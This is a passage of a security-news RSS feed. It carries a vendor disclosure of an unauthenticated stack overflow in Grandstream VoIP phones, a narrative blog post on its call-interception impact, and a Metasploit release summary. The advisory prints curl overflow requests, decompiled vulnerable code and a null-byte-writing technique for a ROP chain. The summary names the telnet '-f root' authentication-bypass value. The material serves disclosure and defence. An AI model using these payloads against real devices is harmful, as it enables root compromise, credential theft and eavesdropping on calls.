⚠️ DISCLAIMER: This video is for educational purposes only. The techniques demonstrated are intended to help security professionals and students learn how to secure systems and understand AI agent capabilities. Do not use these tools on systems you do not own or have explicit permission to test.<br/></p>]]></content:encoded>
</item>
<item>
<title><![CDATA[CVE-2026-2329: Critical Unauthenticated Stack Buffer Overflow in Grandstream GXP1600 VoIP Phones (FIXED)]]></title>
<description><![CDATA[OverviewRapid7 Labs conducted a zero-day research project against the Grandstream GXP1600 series of Voice over Internet Protocol (VoIP) phones. This research resulted in the discovery of a critical unauthenticated stack-based buffer overflow vulnerability, CVE-2026-2329. A remote attacker can lev...]]></description>
<link>https://tsecurity.de/de/3295718/it-security-nachrichten/cve-2026-2329-critical-unauthenticated-stack-buffer-overflow-in-grandstream-gxp1600-voip-phones-fixed/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3295718/it-security-nachrichten/cve-2026-2329-critical-unauthenticated-stack-buffer-overflow-in-grandstream-gxp1600-voip-phones-fixed/</guid>
<pubDate>Wed, 18 Feb 2026 15:36:02 +0100</pubDate>
<category>📰 IT Security Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<h2>Overview</h2><p><a href="https://www.rapid7.com/research/"><span>Rapid7 Labs</span></a><span> conducted a zero-day research project against the </span><a href="https://www.grandstream.com/products/ip-voice-telephony/gxp-series-ip-phones/gxp-series-basic-ip-phones"><span>Grandstream GXP1600</span></a><span> series of Voice over Internet Protocol (VoIP) phones. This research resulted in the discovery of a critical unauthenticated stack-based buffer overflow vulnerability, CVE-2026-2329. </span><span><strong>A remote attacker can leverage CVE-2026-2329 to achieve unauthenticated remote code execution (RCE) with root privileges on a target device.</strong></span><span> A vendor supplied firmware </span><a href="https://www.grandstream.com/support/firmware"><span>update</span></a><span>, version 1.0.7.81, is available to fully remediate CVE-2026-2329.</span></p><p><span>The vulnerability is present in the device's web-based API service, and is accessible in a default configuration. As all models in the GXP1600 series share a common firmware image, the vulnerability affects all six models in the series: GXP1610, GXP1615, GXP1620, GXP1625, GXP1628, and GXP1630.</span></p><p><span>CVE-2026-2329 has a CVSSv4 score of </span><a href="https://www.first.org/cvss/calculator/4-0#CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N"><span>9.3 (Critical)</span></a><span>, and a Common Weakness Enumeration (CWE) of </span><a href="https://cwe.mitre.org/data/definitions/121.html"><span>CWE-121: Stack-based Buffer Overflow</span></a><span>.</span></p><h2>Impact</h2><p><span>To demonstrate the impact of this vulnerability, a Metasploit exploit module has been developed. This demonstrates how an unauthenticated attacker could leverage this vulnerability to gain root privileges on a vulnerable device. A complimentary post-exploitation module has also been developed. This allows an attacker to gather credentials, such as local user and SIP accounts, stored on a compromised GXP1600 device. Both Metasploit modules are available </span><a href="https://github.com/rapid7/metasploit-framework/pull/20983" target="_self"><span>here</span></a><span>.</span></p><p><span>Shown below is the exploit module being run against a target Grandstream GXP1630 device running a vulnerable firmware version 1.0.7.79.</span></p><p>⠀</p><figure><div><img src="https://images.contentstack.io/v3/assets/blte4f029e766e6b253/blt35ee1bd4250b52c5/6994cfcec9b89800084dc38d/figure1_grandstream_gxp1600_rce1.png" alt="figure1_grandstream_gxp1600_rce1.png" caption="Figure 1: Metasploit exploit module targeting a GXP1630 device." height="425" class="embedded-asset" content-type-uid="sys_assets" type="asset" asset-alt="figure1_grandstream_gxp1600_rce1.png" width="705" max-width="705" max-height="425" data-sys-asset-filelink="https://images.contentstack.io/v3/assets/blte4f029e766e6b253/blt35ee1bd4250b52c5/6994cfcec9b89800084dc38d/figure1_grandstream_gxp1600_rce1.png" data-sys-asset-uid="blt35ee1bd4250b52c5" data-sys-asset-filename="figure1_grandstream_gxp1600_rce1.png" data-sys-asset-contenttype="image/png" data-sys-asset-caption="Figure 1: Metasploit exploit module targeting a GXP1630 device." data-sys-asset-alt="figure1_grandstream_gxp1600_rce1.png" data-sys-asset-position="none" sys-style-type="display"><figcaption>Figure 1: Metasploit exploit module targeting a GXP1630 device.</figcaption></div></figure><p>⠀</p><p><span>As we can see above, the attacker achieves </span><span><strong>unauthenticated RCE with root privileges</strong></span><span> on the device. This is demonstrated by executing a Meterpreter payload and running several arbitrary OS shell commands.</span></p><p><span>In addition to achieving RCE with root privileges, we can also demonstrate using this capability to </span><span><strong>extract secrets from the target device</strong></span><span>, such as local and SIP account credentials. Shown below is a Metasploit post-exploitation module that leverages an existing session on the target (established via the exploit module) to extract secrets from the device.</span></p><p>⠀</p><figure><div><img src="https://images.contentstack.io/v3/assets/blte4f029e766e6b253/blt37af103cc529b67a/6994d0051eaffc0008e451ca/figure2_grandstream_gxp1600_rce2.png" alt="figure2_grandstream_gxp1600_rce2.png" caption="Figure 2: Metasploit post module gathering credentials from a GXP1630 device." class="embedded-asset" content-type-uid="sys_assets" type="asset" asset-alt="figure2_grandstream_gxp1600_rce2.png" data-sys-asset-filelink="https://images.contentstack.io/v3/assets/blte4f029e766e6b253/blt37af103cc529b67a/6994d0051eaffc0008e451ca/figure2_grandstream_gxp1600_rce2.png" data-sys-asset-uid="blt37af103cc529b67a" data-sys-asset-filename="figure2_grandstream_gxp1600_rce2.png" data-sys-asset-contenttype="image/png" data-sys-asset-caption="Figure 2: Metasploit post module gathering credentials from a GXP1630 device." data-sys-asset-alt="figure2_grandstream_gxp1600_rce2.png" data-sys-asset-position="none" sys-style-type="display"><figcaption>Figure 2: Metasploit post module gathering credentials from a GXP1630 device.</figcaption></div></figure><p>⠀</p><p><span>Finally, we can leverage our RCE capabilities to reconfigure the target device to use a malicious SIP proxy, allowing an attacker to </span><span><strong>transparently intercept phone calls</strong></span><span> to and from the device, and eavesdrop on the audio. While the ability to leverage a malicious SIP proxy to intercept phone calls is not specific to these Grandstream devices, and is dependent on the SIP infrastructures configuration, it highlights the serious impact an unauthenticated RCE vulnerability has against VoIP phones. Rapid7 Labs has developed a SIP proxy for testing and auditing SIP infrastructure, which is available </span><a href="https://github.com/sfewer-r7/sip-proxy"><span>here</span></a><span>.</span></p><h2>Credit</h2><p><span>This vulnerability was discovered by Stephen Fewer, Senior Principal Security Researcher at </span><a href="https://www.rapid7.com/"><span>Rapid7</span></a><span> and is being disclosed in accordance with Rapid7’s </span><a href="https://www.rapid7.com/security/disclosure/"><span>vulnerability disclosure policy</span></a><span>.</span></p><h2>Technical analysis</h2><p><span>Our analysis is based upon a GXP1630 device running firmware version 1.0.7.79. During testing, the test device had an IPv4 address of 192.168.86.77.</span></p><p><span>A HTTP service is listening by default on TCP port 80. This service provides both a web administration interface and an API. The API endpoint </span><span><span data-type="inlineCode">/cgi-bin/api.values.get</span></span><span> is accessible to a remote attacker with no authentication. This endpoint is designed to request one or more configuration values from the phone. For example, you can request the phone's firmware version and model number via the following HTTP POST request using </span><a href="https://curl.se/"><span>curl</span></a><span>.</span></p><p>⠀</p><pre language="html">C:\&gt;curl -ik http://192.168.86.77/cgi-bin/api.values.get --data "<strong>request=68:phone_model</strong>"
HTTP/1.0 200 OK
Content-Type: application/json;charset=UTF-8
Cache-Control: no-cache, must-revalidate
Status: 200 OK
Set-Cookie: HttpOnly

{ "response": "success", "body": { "68": "1.0.7.79", "phone_model": "GXP1630" } }</pre><p>⠀</p><p><span>The </span><span><span data-type="inlineCode">api.values.get</span></span><span> API accepts an HTTP parameter named </span><span><span data-type="inlineCode">request</span></span><span>. This parameter contains a colon-delimited list of identifiers to retrieve a corresponding value for (highlighted in yellow above). In the example above, identifier 68 corresponds to the phone's firmware version number, and identifier </span><span><span data-type="inlineCode">phone_model</span></span><span> corresponds to the phone's model. We can see in the response, these values are returned.</span></p><p><span>Both the HTTP service and the API are implemented in the native code binary </span><span><span data-type="inlineCode">/app/bin/gs_web</span></span><span> (32-bit ARM, Little Endian). Decompiling the function that handles a request to the </span><span><span data-type="inlineCode">api.values.get</span></span><span> endpoint, we can see how the </span><span><span data-type="inlineCode">request</span></span><span> parameter is split into colon-delimited parts for processing.</span></p><p>⠀</p><pre language="c">void __fastcall sub_144B4(int a1, char *a2, int a3)
{
	int v5; // r6
	const char *v6; // r5
	int v7; // r3
	int v8; // r6
	char *cookie; // r7
	char *remote_addr; // r0
	int v11; // r10
	char *request_buffer; // r11
	int request_length; // r9
	int request_offset; // r4
	int part_length; // r3
	int next_char; // r1
	char *v17; // r2
	char small_buffer[64]; // [sp+0h] [bp-68h] BYREF
	char v19[40]; // [sp+40h] [bp-28h] BYREF

	v5 = (*(int (__fastcall **)(int))(*(_DWORD *)a3 + 16))(a3);
	v6 = (const char *)json_object_new_object();
	sub_CC60(v5, (int)"response", (int)"success", v7);
	sub_CAA4(v5, "body", v6);
	v8 = sub_DE50();
	cookie = get_cookie(a2, (Grandstream::CommonUtils *)"session-identity");
	remote_addr = get_remote_addr();
	v11 = sub_DEC4(v8, (Grandstream::CommonUtils *)cookie, (Grandstream::CommonUtils *)remote_addr);
	request_buffer = sub_C19C(a2, (Grandstream::CommonUtils *)"request");
	request_length = Grandstream::CommonUtils::strlen(request_buffer);
	if ( request_length &gt; 0 )
	{
		request_offset = 0;
		part_length = 0;
		small_buffer[0] = 0;
		do
		{
			next_char = (unsigned __int8)request_buffer[request_offset];
			v17 = &amp;v19[part_length];
			if ( next_char == ':' )
			{
				*(v17 - 64) = 0;
				sub_14354(a1, v6, small_buffer, v11);
				part_length = 0;
				small_buffer[0] = 0;
			}
			else
			{
				*(v17 - 64) = next_char;
				++part_length;
			}
			++request_offset;
		}
		while ( request_offset != request_length );
		if ( part_length )
		{
			small_buffer[part_length] = 0;
			sub_14354(a1, v6, small_buffer, v11);
		}
	}
}</pre><p>⠀</p><p><span>The </span><span><span data-type="inlineCode">request</span></span><span> parameter (referenced via the variable </span><span><span data-type="inlineCode">request_buffer</span></span><span> above) is iterated over character by character. If the next character is not a colon character, this next character is appended to a small 64 byte buffer on the stack (the variable </span><span><span data-type="inlineCode">small_buffer</span></span><span> above). If the next character is a colon, or the end of the </span><span><span data-type="inlineCode">request</span></span><span> parameter is reached, the current identifier held in the small buffer is null terminated and then processed to retrieve that identifier's value.</span></p><p><span>When appending another character to the small 64 byte buffer, no length check is performed to ensure that no more than 63 characters (plus the appended null terminator) are ever written to this buffer.</span></p><p><span>Therefore, an attacker-controlled </span><span><span data-type="inlineCode">request</span></span><span> parameter can write past the bounds of the small 64 byte buffer on the stack, overflowing into adjacent stack memory. This can be demonstrated with the following curl command, which supplies a 256 byte </span><span><span data-type="inlineCode">request</span></span><span> parameter:</span></p><p>⠀</p><pre language="html">curl -ik http://192.168.86.77/cgi-bin/api.values.get --data 
"request=AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"</pre><p>⠀</p><p><span>By either attaching a debugger to the </span><span><span data-type="inlineCode">gs_web</span></span><span> process or inspecting a core dump, we can observe the overflow and how the attacker-controlled data corrupts the stack contents to give the attacker control over multiple CPU registers, including the Program Counter (PC), as shown below.</span></p><p>⠀</p><figure><div><img src="https://images.contentstack.io/v3/assets/blte4f029e766e6b253/blt2ec184e9a5bb08fd/6994e75273e3df0008d2d0b4/figure3_gdb_crash1.png" height="605" alt="figure3_gdb_crash1.png" caption="Figure 3: GDB session showing the process registers after the stack-based overflow." class="embedded-asset" content-type-uid="sys_assets" type="asset" asset-alt="figure3_gdb_crash1.png" width="608" data-sys-asset-filelink="https://images.contentstack.io/v3/assets/blte4f029e766e6b253/blt2ec184e9a5bb08fd/6994e75273e3df0008d2d0b4/figure3_gdb_crash1.png" data-sys-asset-uid="blt2ec184e9a5bb08fd" data-sys-asset-filename="figure3_gdb_crash1.png" data-sys-asset-contenttype="image/png" data-sys-asset-caption="Figure 3: GDB session showing the process registers after the stack-based overflow." data-sys-asset-alt="figure3_gdb_crash1.png" data-sys-asset-position="none" sys-style-type="display"><figcaption>Figure 3: GDB session showing the process registers after the stack-based overflow.</figcaption></div></figure><h2>Exploitation</h2><p><span>To leverage this stack-based buffer overflow for remote code execution, we examine the </span><span><span data-type="inlineCode">gs_web</span></span><span> binary using the </span><a href="https://slimm609.github.io/checksec/"><span>checksec</span></a><span> tool, to see what mitigations are present. </span></p><p>⠀</p><pre language="html">$ /usr/bin/checksec --file=./Release_GXP16xx_1.0.7.79/squashfs-root/app/bin/gs_web --format=json | jq
{
  "./Release_GXP16xx_1.0.7.79/squashfs-root/app/bin/gs_web": {
    "relro": "no",
<strong>	"canary": "no",
	"nx": "yes",
	"pie": "no",</strong>
    "rpath": "no",
    "runpath": "no",
    "symbols": "no",
    "fortify_source": "no",
    "fortified": "0",
    "fortify-able": "5"
  }
}</pre><p>⠀</p><p><span>We can see that </span><a href="https://en.wikipedia.org/wiki/NX_bit"><span>No Execute</span></a><span> (NX) is enabled. This means the stack segment will not be executable. Therefore, to execute arbitrary code we will need to leverage a </span><a href="https://en.wikipedia.org/wiki/Return-oriented_programming"><span>Return Oriented Programming</span></a><span> (ROP) chain.</span></p><p><span>We can see via checksec that </span><a href="https://en.wikipedia.org/wiki/Stack_buffer_overflow#Stack_canaries"><span>stack canaries</span></a><span> are not present (we also knew this from the above core dump, showing PC control after the vulnerable function returns). This means the stack-based buffer overflow will not be detected at run time, and a corrupted return address stored on the stack can be used to control the Program Counter (PC) register, when the vulnerable function returns from the corrupted stack frame.</span></p><p><span>We can also see that the binary has not been linked as a </span><a href="https://en.wikipedia.org/wiki/Position-independent_code#Position-independent_executables"><span>Position Independent Executable</span></a><span> (PIE). This prevents </span><a href="https://en.wikipedia.org/wiki/Address_space_layout_randomization"><span>Address Space Layout Randomization</span></a><span> (ASLR) from randomizing the main binaries code segment. We can therefore know in advance virtual addresses (VA) within the code segment for use during construction of a ROP chain.</span></p><p><span>We are left with a problem that the non-PIE binary </span><span><span data-type="inlineCode">gs_web</span></span><span> has its code segment loaded at a VA of </span><span><span data-type="inlineCode">0x00008000</span></span><span>, as shown below via the </span><a href="https://man7.org/linux/man-pages/man1/readelf.1.html"><span>readelf</span></a><span> tool.</span></p><p>⠀</p><pre language="html">$ readelf -l ./Release_GXP16xx_1.0.7.79/squashfs-root/app/bin/gs_web

Elf file type is EXEC (Executable file)
Entry point 0xbffc

There are 7 program headers, starting at offset 52

Program Headers:
	Type	Offset		VirtAddr	PhysAddr	FileSiz		MemSiz		Flg		Align
	EXIDX	0x0115d8	0x000195d8 	0x000195d8 	0x00810 	0x00810 	R		0x4
	PHDR	0x000034 	0x00008034 	0x00008034 	0x000e0 	0x000e0 	R E 	0x4
	INTERP	0x000114 	0x00008114 	0x00008114 	0x00014 	0x00014 	R		0x1
		[Requesting program interpreter: /lib/ld-uClibc.so.0]
	<strong>LOAD	0x000000 	0x00008000 	0x00008000 0x11dec 		0x11dec 	R E 	0x8000</strong>
	LOAD	0x012000 	0x00022000 	0x00022000 0x00498 		0x0055c 	RW		0x8000
	DYNAMIC	0x01202c 	0x0002202c 	0x0002202c 0x00168 		0x00168 	RW		0x4</pre><p>⠀</p><p><span>With PIE not enabled, and no suitable info leak to leak a VA from another Shared Object (SO) located higher in the address space, a load address of </span><span><span data-type="inlineCode">0x00008000</span></span><span> will require us to write multiple null bytes during exploitation in order to construct a ROP chain, as every VA used within the ROP chain will have at least one null byte. However, the vulnerability only allows for a single null terminator byte to be written during the overflow.</span></p><p><span>To overcome this limitation, we can rely on the fact that the vulnerable function will process the attacker-controlled request parameter as a colon-delimited string of multiple identifiers. Every time a colon is encountered, the overflow can be triggered a subsequent time via the next identifier. We can leverage this, and the ability to write a single null byte as the last character in the current identifier being processed, to write multiple null bytes during exploitation.</span></p><p><span>For example, if we wanted to write a sequence of bytes with 5 null characters in it, e.g., “</span><span data-type="inlineCode">EEE0DDDDDDD0CCCCCCCC00AAAAAAAAAAA0</span><span>" (where </span><span>0</span><span> is a null byte), we can trigger the overflow 5 times. By adjusting the identifier value used to trigger each instance of the overflow, we can precisely place a null character at the desired locations. The table below shows how, in this contrived example, we can construct each separate identifier string in order to place a trailing null terminator character at the desired location. Upon triggering the overflow 5 times in succession, the final memory layout will be as we expect.</span></p><p>⠀</p><table><colgroup data-width="500"><col><col></colgroup><tbody><tr><td><p><span>Overflow 1 (33 bytes + null terminator)</span></p></td><td><p><span>AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA</span><span><strong>0</strong></span></p></td></tr><tr><td><p><span>Overflow 2 (21 bytes + null terminator)</span></p></td><td><p><span>BBBBBBBBBBBBBBBBBBBBB</span><span><strong>0</strong></span></p></td></tr><tr><td><p><span>Overflow 3 (20 bytes + null terminator)</span></p></td><td><p><span>CCCCCCCCCCCCCCCCCCCC</span><span><strong>0</strong></span></p></td></tr><tr><td><p><span>Overflow 4 (11 bytes + null terminator)</span></p></td><td><p><span>DDDDDDDDDDD</span><span><strong>0</strong></span></p></td></tr><tr><td><p><span>Overflow 5 (3 bytes + null terminator)</span></p></td><td><p><span>EEE</span><span><strong>0</strong></span></p></td></tr><tr><td><p><span>Final Memory Layout(34 bytes)</span></p></td><td><p><span>EEE</span><span><strong>0</strong></span><span>DDDDDDD</span><span><strong>0</strong></span><span>CCCCCCCC</span><span><strong>00</strong></span><span>AAAAAAAAAAA</span><span><strong>0</strong></span></p></td></tr></tbody></table><p>⠀</p><p><span>We can therefore construct a malicious colon-delimited </span><span><span data-type="inlineCode">request</span></span><span> parameter to achieve the above (note that, for brevity in this example, the length values here don't assume the required 64 bytes of padding to overflow the initial small buffer):</span></p><p>⠀</p><pre language="html">AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA:BBBBBBBBBBBBBBBBBBBBB:CCCCCCCCCCCCCCCCCCCC:DDDDDDDDDDD:EEE</pre><p>⠀</p><p><span>With the ability to write multiple null bytes, we can proceed to gather the ROP gadgets needed to build out a ROP chain. We choose to create a ROP chain that will execute an arbitrary OS command via the </span><a href="https://man7.org/linux/man-pages/man3/system.3.html"><span>system</span></a><span> standard C library function, before terminating the process gracefully via the </span><a href="https://man7.org/linux/man-pages/man3/exit.3.html"><span>exit</span></a><span> standard C library function to avoid crashing the process. The accompanying Metasploit exploit module’s source code details the entire ROP chain.</span></p><h2>Remediation</h2><p><span>To remediate CVE-2026-2329, Grandstream users running either GXP1610, GXP1615, GXP1620, GXP1625, GXP1628 or GXP1630 devices should upgrade their firmware to version </span><a href="https://firmware.grandstream.com/Release_Note_GXP16xx_1.0.7.81.pdf"><span>1.0.7.81</span></a><span> or above. The latest Grandstream firmware can be found </span><a href="https://www.grandstream.com/support/firmware"><span>here</span></a><span>.</span></p><p><span>For additional details from the vendor, please see the Grandstream </span><a href="https://psirt.grandstream.com/"><span>PSIRT page</span></a><span>.</span></p><h2>Disclosure timeline</h2><ul><li><p><span><strong>January 6, 2026:</strong></span><span> Rapid7 makes initial outreach to Grandstream.</span></p></li><li><p><span><strong>January 20, 2026:</strong></span><span> Rapid7 makes another outreach to Grandstream.</span></p></li><li><p><span><strong>January 20, 2026:</strong></span><span> Grandstream responds to the initial outreach.</span></p></li><li><p><span><strong>January 21, 2026:</strong></span><span> Rapid7 and Grandstream establish a secure communication mechanism.</span></p></li><li><p><span><strong>January 22, 2026:</strong></span><span> Rapid7 discloses the technical writeup and exploit code to Grandstream, who confirms receipt the same day.</span></p></li><li><p><span><strong>February 2, 2026:</strong></span><span> Grandstream indicates a patch has been made available in the GXP1600 firmware version 1.0.7.81.</span></p></li><li><p><span><strong>February 3, 2026:</strong></span><span> Grandstream reaffirms the issue has been resolved in the latest GXP1600 firmware version 1.0.7.81.</span></p></li><li><p><span><strong>February 6, 2026:</strong></span><span> Rapid7 indicates to Grandstream that a CVE has not been assigned and offers to be the CNA for this disclosure. Rapid7 highlights to Grandstream that no public disclosure has occurred, and that it is Rapid7’s intention to disclose publicly in the coming days.</span></p></li><li><p><span><strong>February 7, 2026:</strong></span><span> Grandstream agrees that Rapid7 can be the CNA in this disclosure and requests additional CVE record information. </span></p></li><li><p><span><strong>February 11, 2026:</strong></span><span> Rapid7 provides the requested CVE record information to Grandstream. Rapid7 highlights to Grandstream that firmware version 1.0.7.81 does remediate the vulnerability, as shown by Rapid7 Labs reverse engineering the publicly available firmware. Rapid7 states that a public disclosure will occur on February 18, 2026.</span></p></li><li><p><span><strong>February 18, 2026:</strong></span><span> This disclosure.</span></p></li></ul>]]></content:encoded>
</item>
<item>
<title><![CDATA[The Phone is Listening: A Cold War–Style Vulnerability in Modern VoIP]]></title>
<description><![CDATA[I don’t know about you, but when I think about “critical vulnerabilities,” I usually picture ransomware, data theft, or maybe a server falling over at 2 a.m. while someone frantically searches Slack for the last good backup.What I don’t picture is a scene straight out of a Cold War spy film.CVE-2...]]></description>
<link>https://tsecurity.de/de/3295717/it-security-nachrichten/the-phone-is-listening-a-cold-war-style-vulnerability-in-modern-voip/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3295717/it-security-nachrichten/the-phone-is-listening-a-cold-war-style-vulnerability-in-modern-voip/</guid>
<pubDate>Wed, 18 Feb 2026 15:36:01 +0100</pubDate>
<category>📰 IT Security Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<p><span>I don’t know about you, but when I think about “critical vulnerabilities,” I usually picture ransomware, data theft, or maybe a server falling over at 2 a.m. while someone frantically searches Slack for the last good backup.</span></p><p><span>What I don’t picture is a scene straight out of a Cold War spy film.</span></p><h2><span>CVE-2026-2329: Setting the scene</span></h2><p><span>Dimly lit office. After hours. The city skyline glowing through the glass. Two executives leaning over a polished conference table, whispering about an acquisition. A red light blinking softly on the desk phone. Everything feels normal... Except it isn’t. Researchers at Rapid7 have </span><a href="http://www.rapid7.com/blog/post/cve-2026-2329-critical-unauthenticated-stack-buffer-overflow-in-grandstream-gxp1600-voip-phones-fixed"><span>disclosed </span><span><strong>CVE-2026-2329</strong></span></a><span>, a critical unauthenticated stack-based buffer overflow in the Grandstream GXP1600 series of VoIP phones. Let me take a moment to explain why that sentence, while technical and slightly dry on the surface, should make you sit up a little straighter.</span></p><p><span>At its core, this is a classic memory corruption issue. The kind many of us learned from in our early exploitation days. And if you’ve spent time in cybersecurity long enough, you’ve seen this movie before. But here’s where it gets interesting: an attacker finds an exposed VoIP phone – maybe it’s directly reachable, or maybe it’s pivoted to from somewhere else inside the network. They trigger the overflow, gain root, and at this point, nothing explodes. No alarms go off, and the phone doesn’t brick itself in protest. It just quietly accepts new instructions.</span></p><p><span>With root access, the attacker can reconfigure the device’s SIP settings to point to infrastructure they control. A malicious SIP proxy. Calls still dial. The display still lights up. The user still hears a dial tone. But now, every call flows through someone else’s hands first. There’s no dramatic “wiretap installed” moment. No van parked outside with antennas on the roof. Just silent, transparent interception. Conversations about contracts, negotiations, legal strategy, maybe even sensitive personal matters — all are relayed in real time.</span></p><p><span>This isn’t about crashing a device for fun, it’s about persistence and invisibility. VoIP phones are trusted implicitly. They sit on desks for years, deployed once and forgotten thereafter. Rarely monitored like servers or endpoints, and almost never treated as high-value assets. But voice carries nuance. Tone, intent, and strategy. Things you don’t always see in email or chat logs. The reality of it is that once you move from “denial of service” to “silent interception,” the impact shifts dramatically. This stops being a theoretical CVE in a spreadsheet and starts becoming a confidentiality issue at the human level.</span></p><p><span>Now, to be fair, exploitation requires knowledge and skill. This isn’t a one-click exploit with fireworks and a victory banner. But the underlying vulnerability lowers the barrier in a way that should concern anyone operating these devices in exposed or lightly-segmented environments. And that’s why this one caught my attention. Not because it’s the first buffer overflow we’ve ever seen, and not because it’s technically flashy, but because it works quietly. Perfectly.</span></p><p><span>Like a phone that never misses a call, but while someone else is listening.</span></p><h2>The technical details on CVE-2026-2329</h2><p><span>If you’re a researcher, engineer, or just someone who enjoys digging into stack layouts and exploit chains, we’ve put together a full technical deep dive on the Rapid7 blog. That includes:</span></p><ul><li><span>Root cause analysis</span></li><li><span>Stack memory breakdown</span></li><li><span>Exploit development methodology</span></li><li><span>Post-exploitation impact</span></li><li><span>Metasploit module details</span></li></ul><p><span><em>You can read the full technical analysis </em></span><a href="http://www.rapid7.com/blog/post/cve-2026-2329-critical-unauthenticated-stack-buffer-overflow-in-grandstream-gxp1600-voip-phones-fixed"><span><em>here</em></span></a><span><em>.</em></span></p>]]></content:encoded>
</item>
<item>
<title><![CDATA[Metasploit Wrap-Up 02/13/2026]]></title>
<description><![CDATA[SolarWinds Web Help DeskOur very own sfewer-r7 has developed an exploit module for the SolarWinds Web Help Desk vulnerabilities CVE-2025-40536 and CVE-2025-40551. On successful exploitation the session will be as running as NT AUTHORITY\SYSTEM. For more information see the Rapid7’s SolarWinds Web...]]></description>
<link>https://tsecurity.de/de/3287241/it-security-nachrichten/metasploit-wrap-up-02132026/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3287241/it-security-nachrichten/metasploit-wrap-up-02132026/</guid>
<pubDate>Fri, 13 Feb 2026 21:20:39 +0100</pubDate>
<category>📰 IT Security Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<h2>SolarWinds Web Help Desk</h2><p>Our very own <a href="https://github.com/sfewer-r7">sfewer-r7</a> has developed an exploit module for the SolarWinds Web Help Desk vulnerabilities CVE-2025-40536 and CVE-2025-40551. On successful exploitation the session will be as running as NT AUTHORITY\SYSTEM. For more information see the Rapid7’s <a href="https://www.rapid7.com/blog/post/etr-multiple-critical-solarwinds-web-help-desk-vulnerabilities-cve-2025-40551-40552-40553-40554/">SolarWinds Web Help Desk Vulnerabilities guidance</a>.</p><h2>Contributions</h2><p>A big thanks to our contributors who have been adding some great content this release. <a href="https://github.com/rudraditya21">rudraditya21</a> has added MITRE ATT&amp;CK metadata to lots of our existing modules. <a href="https://github.com/Chocapikk">Chocapikk</a> has added support for GHSA (GitHub Security Advisory) references support in Metasploit modules. <a href="https://github.com/rudraditya21">rudraditya21</a> also added a change which adds negative caching to the LDAP entry cache, which will now mean missing objects are recorded. It also introduces a missing-entry sentinel, tracks misses per identifier type, and updates AD lookup helpers to short‑circuit on cached misses and record misses when a lookup returns no entry.</p><h2>New module content (5)</h2><h3>FreeBSD rtsold/rtsol DNSSL Command Injection</h3><p>Authors: Kevin Day and Lukas Johannes Möller Type: Exploit Pull request: <a href="https://github.com/rapid7/metasploit-framework/pull/20798">#20798</a> contributed by <a href="https://github.com/JohannesLks">JohannesLks</a> Path: freebsd/misc/rtsold_dnssl_cmdinject AttackerKB reference: <a href="https://attackerkb.com/search?q=CVE-2025-14558&amp;referrer=blog">CVE-2025-14558</a></p><p>Description: This adds a new command-injection exploit in the FreeBDS rtsol/rtsold daemons (CVE-2025-14558). The vulnerability can be triggered by the Domain Name Search List (DNSSL) option in IPv6 Router Advertisement (RA) messages, which is passed to the resolvconf script without sanitization. It requires elevated privilege as it needs to send IPv6 packets. The injected commands are executed as root.</p><h3>Ivanti Endpoint Manager Mobile (EPMM) unauthenticated RCE</h3><p>Authors: sfewer-r7 and watchTowr Type: Exploit Pull request: <a href="https://github.com/rapid7/metasploit-framework/pull/20932">#20932</a> contributed by <a href="https://github.com/sfewer-r7">sfewer-r7</a> Path: linux/http/ivanti_epmm_rce AttackerKB reference: <a href="https://attackerkb.com/search?q=CVE-2026-1340&amp;referrer=blog">CVE-2026-1340</a></p><p>Description: Adds an exploit module for the recent command injection vulnerability, CVE-2026-1281, affecting Ivanti Endpoint Manager Mobile (EPMM), formerly known as MobileIron. Exploited in-the-wild as a zero-day by an unknown threat actor.</p><h3>GNU Inetutils Telnet Authentication Bypass Exploit CVE-2026-24061</h3><p>Authors: Kyu Neushwaistein and jheysel-r7 Type: Exploit Pull request: <a href="https://github.com/rapid7/metasploit-framework/pull/20929">#20929</a> contributed by <a href="https://github.com/jheysel-r7">jheysel-r7</a> Path: linux/telnet/gnu_inetutils_auth_bypass AttackerKB reference: <a href="https://attackerkb.com/search?q=CVE-2026-24061&amp;referrer=blog">CVE-2026-24061</a></p><p>Description: This adds an exploit module for the authentication bypass in GNU Inetutils telnetd tracked as CVE-2026-24061. During negotiation, if the USER environment variable is passed in with a value of "-f root" authentication can be bypassed resulting in command execution as the root user.</p><h3>SolarWinds Web Help Desk unauthenticated RCE</h3><p>Authors: Jimi Sebree and sfewer-r7 Type: Exploit Pull request: <a href="https://github.com/rapid7/metasploit-framework/pull/20917">#20917</a> contributed by <a href="https://github.com/sfewer-r7">sfewer-r7</a> Path: multi/http/solarwinds_webhelpdesk_rce AttackerKB reference: <a href="https://attackerkb.com/search?q=CVE-2025-40551&amp;referrer=blog">CVE-2025-40551</a></p><p>Description: This adds an exploit module for SolarWinds Web Help Desk vulnerable to CVE-2025-40536 and CVE-2025-40551. The exploit triggers session opening as NT AUTHORITY\SYSTEM and root.</p><h3>Xerte Online Toolkits Arbitrary File Upload - Upload Image</h3><p>Author: Brandon Lester Type: Exploit Pull request: <a href="https://github.com/rapid7/metasploit-framework/pull/20849">#20849</a> contributed by <a href="https://github.com/haicenhacks">haicenhacks</a> Path: multi/http/xerte_authenticated_rce_uploadimage</p><p>Description: This adds three RCE modules for Xerte Online Toolkits affecting versions 3.14.0 and &lt;= 3.13.7. Two are unauthenticated while one is authenticated.</p><h2>Enhancements and features (10)</h2><ul><li><a href="https://github.com/rapid7/metasploit-framework/pull/20710">#20710</a> from <a href="https://github.com/Chocapikk">Chocapikk</a> - Adds support for GHSA (GitHub Security Advisory) and OSV (Open Source Vulnerabilities) references in 